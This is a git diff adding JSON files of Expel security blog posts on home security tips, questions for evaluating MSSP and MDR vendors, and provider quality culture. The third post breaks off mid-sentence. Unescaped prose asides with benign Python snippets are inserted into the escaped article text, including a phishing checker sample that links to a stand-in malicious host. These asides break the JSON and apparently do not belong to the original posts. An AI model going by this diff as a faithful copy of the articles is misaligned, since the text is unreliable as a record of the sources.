diff --git a/10-tips-for-protecting-computer-security-and-privacy-at-home.json b/10-tips-for-protecting-computer-security-and-privacy-at-home.json new file mode 100644 index 0000000000000000000000000000000000000000..4c9daed2c4d865173fd43cb2bff9512767410cc8 --- /dev/null +++ b/10-tips-for-protecting-computer-security-and-privacy-at-home.json @@ -0,0 +1,6 @@ +{ + "title": "10 tips for protecting computer security and privacy at home", + "url": "https://expel.com/blog/10-tips-protecting-computer-security-privacy-at-home/", + "date": "Apr 23, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG 10 tips for protecting computer security and privacy at home Tips \u00b7 7 MIN READ \u00b7 DAVID SCHUETZ \u00b7 APR 23, 2020 \u00b7 TAGS: Get technical / Heads up / How to Whether you\u2019re at home or at the office, there\u2019s a good chance you\u2019re relying on the internet. At the office you might have a security team who works hard to ensure your data is protected. But what about protecting your security at home? As of late, it seems like nearly everything is connected to our Wi-Fi. From multiple laptops and cell phones, to thermostats and light switches, smart technology makes our lives easier. And now in the age of social distancing, we are relying on our home networks more than ever. But the idea of being responsible for keeping your personal network connections and devices secure can be daunting. Does this mean you should live in a constant state of fear that someone will hack into your network or devices? No. But you do need to know about some steps to take to protect yourself. So \u2026 what threats should you be worried about, exactly? Most common threats For the purpose of this post, let\u2019s put vulnerabilities into three buckets \u2013 networks, endpoints and online behavior \u2013 and talk about why you should care. Networks If it\u2019s connected to the internet (laptops, TVs, voice assistants, etc.), then it can probably access other devices at home. Which means there are ample opportunities for attackers to find entry as we transmit data throughout our networks. But, unless you live off the grid, you don\u2019t have much choice except to rely on the internet to function in society. Think about securing your networks like locking your doors at home. You don\u2019t want attackers to come in and steal your belongings. And you definitely don\u2019t want them using your home to conduct criminal activity (resulting in the FBI busting down your door). Opening a port on your router for a game, connecting a thermostat to the cloud, even giving a visitor your Wi-Fi password for their phone \u2013 these can all open our networks to potential threats. Luckily, there are relatively simple ways you can make sure no one is slipping in your back door while you aren\u2019t paying attention (check out the 10 tips at the end of this post). I also get a lot of questions about using public Wi-Fi. Here\u2019s my advice: getting attacked while using public Wi-Fi isn\u2019t probable if you aren\u2019t a big target, but it is possible. That\u2019s why it\u2019s important to be thoughtful when you are using networks outside of your home. Improve your security on public Wi-Fi by using a VPN, or avoid the Wi-Fi altogether and tether to your cell phone (ideally with a cable). Endpoints Many built-in services on laptops can create more opportunities for attackers. A well-known attack is a fake \u201chelp desk\u201d call, tricking someone into granting remote access to their screen. 
Unless you directly call for IT support, no one needs you to share your screen or to enable remote control. Avoid keeping file sharing features like AirDrop on (and even then, set to accept files from contacts only). Turn on file sharing and remote access only when you need it, and turn it off again once you\u2019re done. Think about the apps you use, too. Be careful when installing an app that asks you to change network settings \u2013 it could be trying to watch your web traffic. And if an application asks for access to your location, contacts, or other privacy-related content, don\u2019t say \u201cYes\u201d unless you understand exactly why it\u2019s asking. As a general rule, lock your computer screen if you get up to grab a cup of coffee and put a lock on your cell phone screen. It\u2019s helpful to update your settings so your screen locks automatically after being idle for five minutes. Sure, locking screens might matter a little less if you live alone and are working from home, but these are still good habits to adopt. Online behavior Attackers often count on us to make a mistake and accidentally open the door for them. Think about the number of times you enter your bank and credit card information when you\u2019re ordering groceries from Amazon. Make sure you\u2019re shopping through reputable dealers and avoid storing your credit card information on a website. Many banks will allow you to set up text message alerts for large purchases or unusual activity \u2013 a smart feature to enable, to be on the safe side. Then there\u2019s phishing. What makes something look suspicious? Emails with a sense of urgency or a time limit, obscure invoices and warnings of disastrous outcomes are all red flags. Pop-ups that won\u2019t go away or are asking you to download something are often nefarious. Make sure you also hover over links and investigate them before clicking them. Do I need to bother mentioning that you shouldn\u2019t plug an unknown USB drive into your computer? Just in case\u2026don\u2019t do that. Don\u2019t be too quick when granting access to shared documents in G-suite or iCloud, for example. Make sure people and organizations can be vouched for and are trusted before granting access. Watch what you share on social media. Never give out your address or personal information. Hackers can search on social media sites to find answers to security questions. Tips and tricks for computer safety and privacy We\u2019ve only scratched the surface and already this looks like a lot of work. How can you make sure you aren\u2019t allowing yourself to be a target without spending your entire day thinking of all the ways you can be attacked? Use these 10 tips and tricks. Create strong passwords, don\u2019t reuse them on different sites, and ALWAYS use MFA \u2013 multi-factor authentication \u2013 when given the option (these are one-time passwords, push messages, even text messages in a pinch). Also, use a password manager application! A good password manager can make it easy to select strong, unique passwords, and should support many built-in MFA systems. They can warn you if you\u2019ve accidentally reused a password, or if you forgot to enable MFA. They can even alert you when sites you visit have had a recent password breach. Keep your software updated on operating systems, apps, laptops, cell phones and routers. Vendors are constantly patching bugs and security holes, some of which can be critical entry points for an attacker. 
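As an aside on that first tip: if you want a feel for what a strong, unique password or passphrase actually looks like, here is a minimal Python sketch using the standard-library secrets module. The short word list is a placeholder for illustration; real generators (diceware lists, password managers) draw from thousands of words, and a password manager will also remember the result for you.

```python
import secrets
import string

# Placeholder word list for illustration only; a real passphrase generator
# draws from a list of thousands of words (e.g. a diceware word list).
WORDS = ["maple", "quartz", "harbor", "tiger", "velvet", "ember", "falcon", "orbit"]

def passphrase(word_count: int = 5) -> str:
    """Random words joined with dashes, plus a digit for sites that insist on one."""
    words = [secrets.choice(WORDS) for _ in range(word_count)]
    return "-".join(words) + "-" + secrets.choice(string.digits)

def random_password(length: int = 20) -> str:
    """A random-character password, best left to a password manager to remember."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(passphrase())
print(random_password())
```

The detail that matters here is the use of secrets (a cryptographically secure random source) rather than random, and length over cleverness.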
Most operating systems and app stores can automatically update their software for you. Keeping your home network updated (Wi-Fi routers, etc.) isn\u2019t quite as critical, but if it\u2019s been years since you looked at your router, it may be a good idea to check for updates. Use WPA2 with a strong password when setting up Wi-Fi at home. For your visitors, consider setting up a guest network with a different network name and password. Disallow remote access to your network and desktop (remote login, screen and file sharing, etc.) by disabling it on your computers and limiting the number of ports you let through the internet router. When you do need it, enable it only for the time you\u2019ll be using it, and then immediately turn it back off again. Create a separate administrator account, and use a non-admin account for day-to-day activity. By keeping your administrator \u201cpersona\u201d separate from your daily use account, you lessen the chance that you may accidentally install malicious software without paying attention (many of us are a little too quick to click that \u201cOK\u201d button when we are prompted). By forcing you to switch to a different account, you ensure that a random, \u201cOh, I need your admin password now,\u201d prompt isn\u2019t going to break your computer, and makes installation of software and system-level changes a much more explicit action. Be careful with what you share online. Many sites still use \u201csecret questions\u201d to help you recover passwords. But a secret question like \u201cWhat brand was your first car?\u201d is only secret if that information is hard to find. Many common secret questions end up being things that people frequently share online (as part of a Facebook profile, or some forgotten tweet that might be easily searched for). Still others may be found from common data aggregation services \u2013 it\u2019s surprisingly easy to find the last five home addresses for just about anyone, often for no charge. Also, you should be careful not to give away too much about where you are (\u201cI\u2019m in Europe for a month, and our dogs are at the kennel, so our big suburban home in the wooded neighborhood is COMPLETELY UNATTENDED.\u201d) It\u2019s not likely that burglars are trolling social media to find targets, but you shouldn\u2019t make it too easy for them, either. Be thoughtful about the apps you install and always download from a trusted app store when possible. The \u201cbig\u201d app stores (Apple, Google, etc.) do a pretty good job of making sure that malicious software is kept out, and sticking to just those sources will go a long way to keeping you safe and secure. Whenever something (especially a website) prompts you to download a \u201cspecial app,\u201d don\u2019t download it right then and there. Instead, note what the file is (or does) and try to find it, or a suitable equivalent, in one of the main app stores. Even if you can\u2019t find it in the app store, if you can independently source it on the web, rather than taking the version the website just offered, that\u2019s usually a better plan. Have a keen eye for phishing and social engineering. Scams still come through email more than any other method, but the phone is a growing source of computer attacks. The most common is some variant of a \u201chelp desk\u201d calling to warn you that your computer is compromised, and asking you to do things to help them secure it (which instead just opens it up to their attacks). 
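Since the phishing discussion picks back up below, here is a rough sketch of the kind of red-flag checks described in this tip: urgency language, and link text that doesn't match where the link really goes. The phrase list and the regex-based handling of HTML are deliberate simplifications for illustration, not a real mail filter.

```python
import re
from urllib.parse import urlparse

# Illustrative phrases only; real filters use far richer signals than keywords.
URGENCY_PHRASES = ["urgent", "immediately", "suspended", "verify now", "final notice"]

# Pull href/text pairs out of an HTML email body. A regex is good enough for a sketch.
ANCHOR_RE = re.compile(r'<a[^>]+href="([^"]+)"[^>]*>(.*?)</a>', re.IGNORECASE | re.DOTALL)

def red_flags(html_body: str) -> list:
    flags = []
    lowered = html_body.lower()
    for phrase in URGENCY_PHRASES:
        if phrase in lowered:
            flags.append("urgency language: %r" % phrase)
    for href, text in ANCHOR_RE.findall(html_body):
        shown = re.sub(r"<[^>]+>", "", text).strip().lower()
        actual = (urlparse(href).hostname or "").lower()
        # The visible text looks like a domain but the link goes somewhere else entirely.
        if "." in shown and shown.split("/")[0] not in actual:
            flags.append("link text %r actually points to %r" % (shown, actual))
    return flags

sample = '<a href="https://login.evil.example.net/reset">paypal.com</a> Your account is suspended, verify now!'
print(red_flags(sample))
```

Hovering over a link does the same comparison by eye: the gap between what is displayed and where it resolves is the tell.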
Plus there are all manner of old-school confidence tricks that people still succeed in pulling off, through phone calls, text messages and email. Learn how to recognize these, and swiftly ignore them when they happen (hang up, delete, etc.). If your router (and tech-fu) supports it, put all your internet of things, er, things (security cameras, baby monitors, refrigerators, smart-locks, etc.) on a totally separate network with its own access point. This is a great place to put your guest network as well, though they\u2019ll lose the ability to interact with your TV, etc. Backups, backups, BACKUPs! Backing up your data is a pain. Do it anyways. Follow the 3-2-1 rule: Keep 3 copies of your data; on 2 different systems (for example, one in the den, one in the basement); and 1 off-site (like at a friend or relative\u2019s house). Keeping two copies at home protects you against a single computer failure or breach, keeping one outside of the house protects you against a house fire. Cloud based services like Backblaze are fantastic for offsite backups. Have a question about keeping your stuff secure at home? We\u2019ve got lots of security nerds over here who\u2019d love to help you. Just send us a note ." +} \ No newline at end of file diff --git a/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json b/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json new file mode 100644 index 0000000000000000000000000000000000000000..88fbfe62c6fc9d16316d018fb234319660c04558 --- /dev/null +++ b/12-revealing-questions-to-ask-when-evaluating-an-mssp-or.json @@ -0,0 +1,6 @@ +{ + "title": "12 revealing questions to ask when evaluating an MSSP or ...", + "url": "https://expel.com/blog/12-revealing-questions-when-evaluating-mssp-mdr-vendor/", + "date": "Feb 19, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 12 revealing questions to ask when evaluating an MSSP or MDR vendor Tips \u00b7 9 MIN READ \u00b7 YANEK KORFF \u00b7 FEB 19, 2019 \u00b7 TAGS: How to / Managed security / Planning / Selecting tech / Tools Over the last 20 years, we\u2019ve heard all kinds of interesting questions as prospective customers evaluate which type of managed cybersecurity service is right for them. The questions are often buried in a big spreadsheet, otherwise known as a request for proposal (RFP). Some of them are remarkably well thought out and put together. However, the vast majority follow a well-worn path and are kind of predictable (check out Gartner\u2019s MSSP RFP Toolkit for some of the greatest hits). But the thing about predictable questions is they generate \u2014 you guessed it \u2014 predictable answers that leave one provider sounding a lot like the rest. So in an attempt to arm you with a few questions that\u2019ll make your prospective MSSP or managed detection and response (MDR) provider stop and think, we\u2019ve compiled a short list of revealing questions that we think any service provider should be able to answer with flying colors. (Although sadly, we find that many don\u2019t.) Without further ado, here we go. Can you provide an example of ways you\u2019ve adapted your service to your customers\u2019 environments? You know as well as we do that one size doesn\u2019t fit all. Your industry, your geography, your company, your strategy, your tactics, your team \u2026 all of these variables mean every company is different. Even if you find a service provider that\u2019s a good fit today, will they adapt so they can be a good fit tomorrow? 
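Circling back to the 3-2-1 backup tip in the article above: backups only count if the copies actually match. Below is a minimal sketch that compares SHA-256 checksums between two copies; the directory paths are hypothetical stand-ins for "one in the den, one in the basement."

```python
import hashlib
from pathlib import Path

def checksums(root: Path) -> dict:
    """Map each file's path relative to root to its SHA-256 digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            # Fine for a sketch; stream large files in chunks in real use.
            digests[str(path.relative_to(root))] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests

# Hypothetical locations for two of the three copies in the 3-2-1 rule.
primary = checksums(Path("/home/me/documents"))
backup = checksums(Path("/mnt/backup/documents"))

missing = sorted(set(primary) - set(backup))
differing = sorted(name for name in set(primary) & set(backup) if primary[name] != backup[name])
print("missing from backup:", missing)
print("copies that differ:", differing)
```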
How will they continue to tune their service so you\u2019re always getting what you need? Many providers will talk about \u201cbusiness context.\u201d It\u2019s a bit of a holy grail to security service providers so make sure you understand what it is and how it works. Can your provider differentiate an attacker from that weird PowerShell blip when Jenna the sysadmin runs her same PowerShell command every Wednesday morning? Can they react faster if the CFO gets phished? Are they able to ignore PUP/PUA at one customer because it\u2019s noise, but report it every time at another because it\u2019s the CISO\u2019s priority? Without this ability, over time you\u2019ll feel like you\u2019re being served the same gruel day after day. How long, on average, did it take to fully onboard your last 10 customers, and at what point did you consider the onboarding complete? There are few activities in the managed security space that evoke more dread than onboarding. Notorious for exceptionally long, complex and error-prone disasters rife with miscommunication, onboarding roadmaps and project plans can get complex quickly. What\u2019s worse, success may mean one thing to the provider and something else to you. But it doesn\u2019t have to be this way. During the RFP process, make sure you understand what activities mark the onboarding process as being complete and ask your provider how long it took them to go through that process for their last 10 customers. Get real data. Or, even better, ask the provider if some of these customers can be references and validate this data. Remember, onboarding time has three components: calendar time (end to end how long it took), your organization\u2019s time (how much new customers have to do, and how long it takes) and the provider\u2019s time (you should care about this because it contributes to component #1 \u2014 calendar time). One last #protip for ya: ask your provider if you\u2019re going to have to pay for service during onboarding. Can you use my existing security technology or will you require that we implement new technology? You\u2019d think this one would be obvious, but many providers will mandate that you either buy new technology, add their technology (because they won\u2019t use what you already have) or introduce a duplicate technology (usually their SIEM) because their architecture demands it. A service provider in this space should be using the technology you already have in play and operationalizing it. That means ingesting the data your security products are already producing, analyzing that information and delivering answers about what matters and what doesn\u2019t. Now, not all technology is created equal. Some categories of security tech are best suited to detection, other categories are more useful when you\u2019re investigating an incident or proactively hunting for bad things in your environment. You\u2019ll want to make sure the tech you have in place can actually do what it needs to do. That said, this shouldn\u2019t come across as a requirement from your MSSP or MDR \u2014 a provider should not tell you that you need to buy this and that for anything to work. Instead, you should get a higher fidelity answer like: \u201cWithout an endpoint detection and response (EDR) tool, our ability to investigate will be limited, as will our hunting capability \u2014 some of which relies on EDR.\u201d How does your detection and response strategy differ among on-prem technology, cloud infrastructure and cloud applications? 
\u201cWe monitor your AWS, Azure and O365 environments for threats and respond immediately!\u201d Have you heard this one before? This isn\u2019t an answer. The way you differentiate between providers that \u201cspeak cloud\u201d and those that don\u2019t is by listening closely to their detection and response philosophy. What\u2019s different about security in the cloud versus on-prem? How are the approaches they take for static versus elastic cloud infrastructure different? Or are they? What about cloud applications? How do they think about the security of configuration settings versus the security of data residing in containers? Validating a security provider\u2019s ability to handle your cloud security is one of the more challenging aspects in the assessment process. Consider looping in people from your own organization that are responsible for your cloud strategy and implementation. They\u2019ll ask good questions and can help you evaluate the answers you receive. How will we work together during a security incident? When a security incident arises, communication is key. You and your service provider begin in a fog of war. Keeping exceptional clarity on \u201cwhat we know\u201d and \u201cwhat we don\u2019t know for sure yet\u201d is essential to navigate the investigation and response process that follows. Understanding how your provider will communicate this info (and how quickly) is important. Do you have to log into a portal and review a mostly static page updated once every few hours? That\u2019s a useful artifact, but not a useful communication method. Do you submit a ticket? Ugh. Instead, look for effective methods that include rapid info sharing and multi-person communication. Of course, during an incident you\u2019ll have to communicate with all sorts of people \u2014 inside and outside of your organization. Your service provider might have relationships with law firms who have experience in breach communications. They may also have relationships with incident response providers who can show up on-site at a moment\u2019s notice. Either way, do your own research and find firms that are a good fit for your organization. Of course, it\u2019s always easier to do this before an incident than during one. Running your own incident response tabletop exercises can reveal a lot (we\u2019ve even created a role-playing game to try and make it fun \u2014 give it a go and let us know what you think). Can you provide an example of a time you learned something from a customer that improved your service? A security service that fails to learn and grow isn\u2019t actually a security service. It\u2019s \u2026 well, we\u2019re not sure what it is, but at the end of the day it\u2019s pretty useless to you. Sure, it might provide the illusion of security, but in reality there\u2019s a lot of time spent turning cranks that produce nothing. We\u2019ve heard this complaint from more than a few CISOs: \u201cMy MSSP is a black box. I put my money in and nothing comes out.\u201d Your prospective service provider should have crisp examples of how they\u2019ve learned and improved the way they help all of their customers. And it should be material. Not something simple like, \u201cI found this threat here so I added it to my intel database.\u201d That\u2019s table stakes. 
What caused your service provider to rethink something and say to themselves, \u201cI think the way we\u2019re tackling this is wrong based on this customer feedback \u2026 let\u2019s do it differently?\u201d Demonstrating the ability to adapt ensures your service provider will grow with you. How will you give me the visibility I need to be confident that you\u2019re making the right decisions for my organization? Don\u2019t just trust, but verify. It\u2019s what you\u2019re paying your service provider to do after all, so you should have confidence not only that they\u2019re doing the right thing \u2026 but that they\u2019re doing it right too. Take a moment to think through the steps that comprise \u201csecurity operations.\u201d Triage. This is the process analysts go through to evaluate (often quickly) whether something is a false positive or warrants investigation. Sometimes these analysts are humans. Sometimes they\u2019re robots. Does your provider tell you both who made the decision and why? If they filter out something important very early but were wrong, that\u2019s a problem. Investigations. Will your provider show you what information their analysts pulled from your environment? Can you get a sense of the thought process they use to decide what to retrieve? And what to make of it? This is where expertise really comes into play. Reporting and response. Is the output you receive easy to understand? Are response actions clear, and do you have control over who-gets-to-meddle-with-what in your infrastructure? If you have to translate everything your provider is telling you so that mere mortals who don\u2019t speak security can understand it, that\u2019ll become frustrating \u2026 fast. As you take a step back and look through what\u2019s been done, does the provider have timestamps for every step that was taken so you can evaluate this information and measure whether their overall performance is improving or degrading? Ultimately, you have to answer this question: Did they show their work? That\u2019s the only way to verify that they\u2019re doing what you\u2019re paying them to do. When things start to break, how (quickly) do you find and fix the problem? When do I find out about it? If you\u2019ve worked with an MSSP before, you\u2019re familiar with this problem we\u2019re about to summarize. Nine months after a piece of technology stopped sending data, the provider found out it was broken. Because you told them. That\u2019s a big hit to your visibility and a lot of risk you took on without any warning. Not cool. How will your new prospective provider handle this? Can they detect when a device becomes unreachable? How fast? What about if the device stays online but stops sending data? Or worse \u2013 what if there\u2019s a significant and unexpected drop in data volume? Who\u2019s responsible for monitoring this stuff and how quickly can they recover? Get examples if you can, and bonus points if they provide you direct visibility into this kind of monitoring. How did you identify and report on an active red team engagement conducted on one of your customers\u2019 networks? Yeah, we know this one feels pretty specific, but we\u2019ve run into too many instances where customers brought in a relatively sophisticated red team partner only to discover their managed security provider was blind to these mock adversaries. They couldn\u2019t even detect them, let alone investigate or respond. 
To be clear, when we say red team , we\u2019re talking about a group of whitehats who try to break into your network, escalate privileges, move laterally and steal stuff \u2026 and then report on things you can do to improve your defenses. Can your new potential partner provide an example of this exercise playing out? How did they detect the \u201cattacker\u201d in this case and to what extent were they able to provide ongoing reporting? Once again, bonus points for the provider if they\u2019ll let you hear all of this directly from one of their current customers. When I have a question or concern how do I engage with your team? We talked about communication during an incident. What about when there\u2019s no incident? Is it the same process, or are there two different processes? The more you have to adapt to your provider\u2019s modes of communication, the less likely you\u2019ll remember to do the right thing when the time is right. Watch out for laggy ticketing systems and be cautious about support portals where the identity of the people you\u2019re talking to is hidden. Your partner\u2019s security analysts will have exceptionally generous access to your data. You should be able to get to know who they are and interact with them directly from time to time. Can you show me how you calculate the price of your service? Every provider will give you a price. But can you understand how and why they got to that number? Be wary of long rambling answers. If your prospective provider can\u2019t give you a crisp answer or, better yet, quote you a price on your first sales call, imagine how the conversation will go once you become their customer. If selected, can you provide a free 30-day proof of concept to demonstrate you can deliver on the expectations you\u2019ve set? After you\u2019ve asked all of your questions, appraised the responses and picked a winner there\u2019s a good chance you\u2019ll still be asking yourself, \u201cCan they really do all of these great things in my environment?\u201d Exaggerated sales and marketing claims are, unfortunately, one of the biggest scourges on the security industry. You don\u2019t want to get a few weeks into a new agreement and learn your new provider can\u2019t do everything they promised or, even worse, find out when they missed something important. One of the most effective ways to mitigate this risk is to hop on your provider\u2019s service on an interim basis. It gives you a chance to get a feel for what the interactions will be like and gives your potential partner an opportunity to prove themselves. And if your prospective service provider can\u2019t even get this operational within 30 days? Well, that tells you all you need to know. So there you have it. Twelve questions that can help you sleuth out what it will be like to work with your managed security provider. If you\u2019ve got other questions, we\u2019d love to hear them. Or if you\u2019re reading this and thinking \u201cmaybe I\u2019ll just build my own SOC,\u201d check out our post on all the things you\u2019ll need to consider if you\u2019re thinking of building a 24\u00d77 SOC." 
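The "when things start to break" question above is easy to make concrete. Here is a toy sketch of the underlying idea: compare each log source's latest interval against its own recent baseline and flag sources that have gone silent or quietly dropped in volume. The thresholds and the shape of the counts structure are invented for the example.

```python
import time

def silent_or_degraded(counts, now=None, silence_after=3600, drop_ratio=0.25):
    """counts: {source: [(epoch_seconds, events_in_interval), ...]}, oldest first."""
    now = now or time.time()
    problems = {}
    for source, series in counts.items():
        if not series:
            problems[source] = "no data ever received"
            continue
        last_ts, last_count = series[-1]
        if now - last_ts > silence_after:
            problems[source] = "silent for %ds" % (now - last_ts)
            continue
        baseline = sum(count for _, count in series[:-1]) / max(len(series) - 1, 1)
        if baseline and last_count < baseline * drop_ratio:
            problems[source] = "volume dropped to %d (baseline ~%d)" % (last_count, baseline)
    return problems

counts = {
    "firewall": [(0, 900), (600, 950), (1200, 80)],  # sudden drop in the last interval
    "edr": [(0, 40)],                                # only one interval so far
}
print(silent_or_degraded(counts, now=1500))
```

A provider should be doing something far more robust than this, but if they can't describe at least this much, you have your answer.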
+} \ No newline at end of file diff --git a/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json b/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json new file mode 100644 index 0000000000000000000000000000000000000000..ff9f6dae6dbbcabc6fcea80f06579be7b8817cde --- /dev/null +++ b/12-ways-to-tell-if-your-managed-security-provider-won-t-suck.json @@ -0,0 +1,6 @@ +{ + "title": "12 ways to tell if your managed security provider won't suck ...", + "url": "https://expel.com/blog/12-ways-to-tell-managed-security-provider-wont-suck-next-year/", + "date": "Mar 22, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG 12 ways to tell if your managed security provider won\u2019t suck next year Security operations \u00b7 9 MIN READ \u00b7 YANEK KORFF \u00b7 MAR 22, 2019 \u00b7 TAGS: CISO / How to / Managed security / Selecting tech / Tools I used to love my iPhone. Now, at best, it works fine when new features aren\u2019t getting in my way. I also remember when AOL was amazing, ICQ was the best chat client and Netscape was the go-to browser. Maybe it\u2019s inevitable that the things we love will eventually be superseded, though hopefully not too quickly. Let\u2019s take a look at \u201csecurity operations.\u201d Turning logs and other forms of security signal into useful actions is an activity that\u2019s been around for decades. Whether companies have their own internal capability or have outsourced to a managed security provider, the breach headlines have continued unabated. Okay, that\u2019s not entirely true \u2014 they\u2019ve accelerated. And yet, even in this morass that is the security industry, every once in a while you\u2019ll find someone truly delighted about the products or services they\u2019re using. But delighted customers are the exception when it comes to managed security service providers (MSSPs). Some will tell you that MSSPs take your money and give you nothing in return or that they\u2019re a black stain on our industry. In fact, according to Forrester\u2019s 2017 Global Business Technographics\u00ae Security Survey, 34 percent of responding organizations were actively evaluating alternatives or actively planning replacement of their existing MSSP . In an industry where three-year contracts are common, a third of the market was in the process of switching at the time of the survey. Math doesn\u2019t paint a pretty picture here. In this ten billion dollar industry that\u2019s growing nearly 10 percent each year, thousands of companies are beyond disgruntled: they\u2019re looking to get rid of their current provider. If you\u2019re somewhere in that one-third of the market that\u2019s looking to switch to another MSSP, you\u2019re probably thinking to yourself, \u201cI thought my provider would be better \u2026 and they were for a little while. Then it all went down the toilet.\u201d So, before you sign that next contract how do you determine the likelihood that the quality of the service will last? How long will you be happy with the quality of your service provider? You might be able to get a sense of this through a proof-of-concept exercise but that won\u2019t tell you much about how you\u2019ll feel a year (or five) from now. Delighters will become table-stakes over time \u2014 so, to truly satisfy you, any new service will have to do more than just not deteriorate. It has to improve. Constantly. Creating a culture that searches for quality Why is it so essential that quality is core to your provider\u2019s DNA? 
Well, because it\u2019s already part of yours. You\u2019ve got a limited budget and a part of your job is to get the most bang for your buck over time. So you\u2019ll constantly be changing your investments to ensure you\u2019re getting the most for your money. A dollar you spend a year from now should be doing more than a dollar today. This translates directly to your service provider: an hour of work your service provider does today had better do more for you a year from now than it does right this minute. This means everyone (yes, everyone) at your service provider\u2019s organization needs to be looking at ways to improve quality constantly. So how can you tell if an organization\u2019s got it? Here are some key characteristics that we\u2019ve seen that create an environment where a persistent focus on quality can emerge: People feel a sense of trust and psychological safety, People have ownership of the problems they\u2019re trying to solve, People have the energy to engage in quality-seeking behaviors, and People can honestly self-assess throughout the process. You\u2019re probably thinking \u201cthat sounds pretty soft and squishy.\u201d So how do you assess whether a company you\u2019re talking to has built this sort of culture? Well, without further ado, here are a dozen things you can do to sniff out whether \u201cthe search for quality\u201d exists at an organization. 1. In search of trust \u2013 look for transparency Transparency means more than just being forthcoming. It means making the effort to be easily understood. There\u2019s no shortage of places you can go to find examples of an org\u2019s transparency. Start with the website and see if you can figure out what the company does and how they do it. As you ask questions to fill in the gaps, take note of whether you can understand the answers or if they\u2019re wrapped in marketing buzzwords or technical mumbo-jumbo. See how deeply transparency extends into the organization. Spend some time to understand the company\u2019s high-level goals. As you run into various employees in your evaluation process, ask them what these goals are and what they think about them. Ask what\u2019s going well and what\u2019s challenging. If employees can\u2019t (or won\u2019t) be forthcoming when they\u2019re literally trying to sell you something, what are the chances they\u2019ll be honest when they screw up? 2. In search of trust \u2013 look for simple execution Trust is a fickle thing. As we approach new relationships, we come with some amount of default trust in the new partner. I like to call this the \u201ctrust bank.\u201d If you\u2019ve had your trust violated a little too often, you won\u2019t be very generous when it comes to initial your initial deposit in the trust bank. If you\u2019re a bit more optimistic you might make a huge trust deposit up front, thinking the best of people. The unfair thing about trust banks is that deposits are always small, but withdrawals are easily five times as large. During your conversations, the service provider will promise to do many things. They\u2019ll send you a summary. They\u2019ll put you in touch with another customer. They\u2019ll get you on the phone for a chat with someone with greater technical depth in an area that\u2019s important to you. They\u2019ll promise you a quote. Do they follow through on those things? And do they meet the expectations they set within the timeframes they promised? 
It is surprisingly difficult for people to consistently meet simple obligations like doing what they said they\u2019d do. So when you find that in an organization, it really stands out. 3. In search of trust \u2013 look for failure It\u2019s easy to provide examples of past successes. It\u2019s a lot harder to admit failure. You\u2019re about to sign up for a long-term service. You\u2019ve got a right to know what sort of problems there will be. How will they be identified, communicated and handled? Ask for an example, and ask for artifacts (redacted and/or anonymized presumably). Get the full story and ask a lot of questions to fill in the blanks. An organization that knows how to handle failures and turn them into success stories is well positioned to earn (and keep) your trust. 4. In search of ownership \u2013 identify roles and responsibilities You\u2019ll have the opportunity to meet several people at a potential provider during the courtship process. Pick two or three different roles and get a copy of their job description (this may or may not be what\u2019s posted on the company\u2019s website). Ask those employees what their responsibilities are and make sure things line up. Do employees seem to understand where their responsibilities start and end? Can they point to other teams within the org and tell you how the teams work together? Sounds pretty basic, but having a strong sense of ownership often breaks down when this foundation is missing. 5. In search of ownership \u2013 ask about projects When you\u2019re meeting with mid-level and senior people at the organization who aren\u2019t part of the management team, ask about what they\u2019re working on. Usually, technical people are more than happy to share some of the projects they have in flight. Then, ask why they\u2019re working on those projects. In organizations where employees feel a strong sense of ownership, they look at their work not as tasks, but as solving business problems or customer problems. They articulate their work in the context of something greater. 6. In search of energy \u2013 ask about work and life People think about \u201cwork/life balance\u201d differently. As you interact with people at your service provider, ask them how they view the work/life balance at the company. Does it meet their needs? Do they get vacation time? Sick leave? How much? Do people actually take vacation? Do people feel like they can disconnect? In environments where there are lots of \u201csingle points of failure,\u201d people tend to work hard constantly, be stressed out and make more mistakes. While this might happen from time to time due to shifts in staffing, it shouldn\u2019t be the norm. On the other hand, where people feel like they get the space they need to bring all their enthusiasm to bear, they\u2019ll do better work and you\u2019ll be happier for it. 7. In search of energy \u2013 ask about celebrations and praise One of the factors that contributes the most to quality work is recognition that individuals and teams have done well. Contrast this with environments in which \u201cthe beatings will continue until morale improves.\u201d Yeah, you\u2019ve been there and seen that. Ask about the last few company events, what they were and why they happened. What were they celebrating? What about the last spot award or \u201ckudos\u201d someone got? Can they remember when something like that happened? 8. 
In search of quality-seeking behaviors \u2013 ask about conflict There\u2019s plenty of info out on the interwebs about the negative effects of groupthink and the need for constructive debate. Yet \u201cconflict\u201d seems to be a dirty word in most office environments. Instead of having a difficult conversation we hear \u201clet\u2019s take it offline\u201d which is office lingo for \u201clet\u2019s stop talking about this because it\u2019s making me uncomfortable.\u201d Ask about disagreements, technical or otherwise, and how they\u2019re resolved within the organization. Ask for an example. You\u2019ll quickly get a sense as to how the environment supports constructive disagreement and the extent to which \u201coffice politics\u201d play a role. 9. In search of quality-seeking behaviors \u2013 ask about metrics You may only get operational insight into a subset of the metrics your service provider uses to measure the quality and efficacy of what they do every day. Have someone walk you through it. How does the org measure the effectiveness of detection logic? How do they measure the availability of technology, whether it\u2019s their own or yours? Can someone provide an example of a metric he or she thought was useful \u2014 but turns out it wasn\u2019t? Is there a metric the org recently added because they\u2019ve learned something new? Look for this engine of continuous improvement within the things they count and measure. 10. In search of quality-seeking behaviors \u2013 ask about hiring When you were hired, someone entrusted you to make good hiring decisions. When you hired a manager, you entrusted her to do the same. Maybe you provided feedback, coaching or training to help her be more effective. As you bring on a service provider, you have the same need. Their hiring practices will directly impact the quality of the service you experience over time. How do they think about hiring? Talk to the head of HR. Do they use a structured hiring process? How do they think about evaluating experience, skills and traits? What key traits do they look for in hires throughout the organization? Any organization with rich answers around these questions (especially when these answers are consistent throughout the organization) clearly has a high hiring bar. 11. In search of self-assessment \u2013 ask about evaluations Do employees have the opportunity to think about how they\u2019re doing and how they\u2019re growing? And does anyone guide them through this process? The answer here can\u2019t be as simple as \u201cyeah, we do annual reviews \u2026 and they\u2019re super stressful.\u201d A huge component of perpetually increasing quality is making sure that every employee has real, ongoing opportunities for learning and growth. As you meet security practitioners, 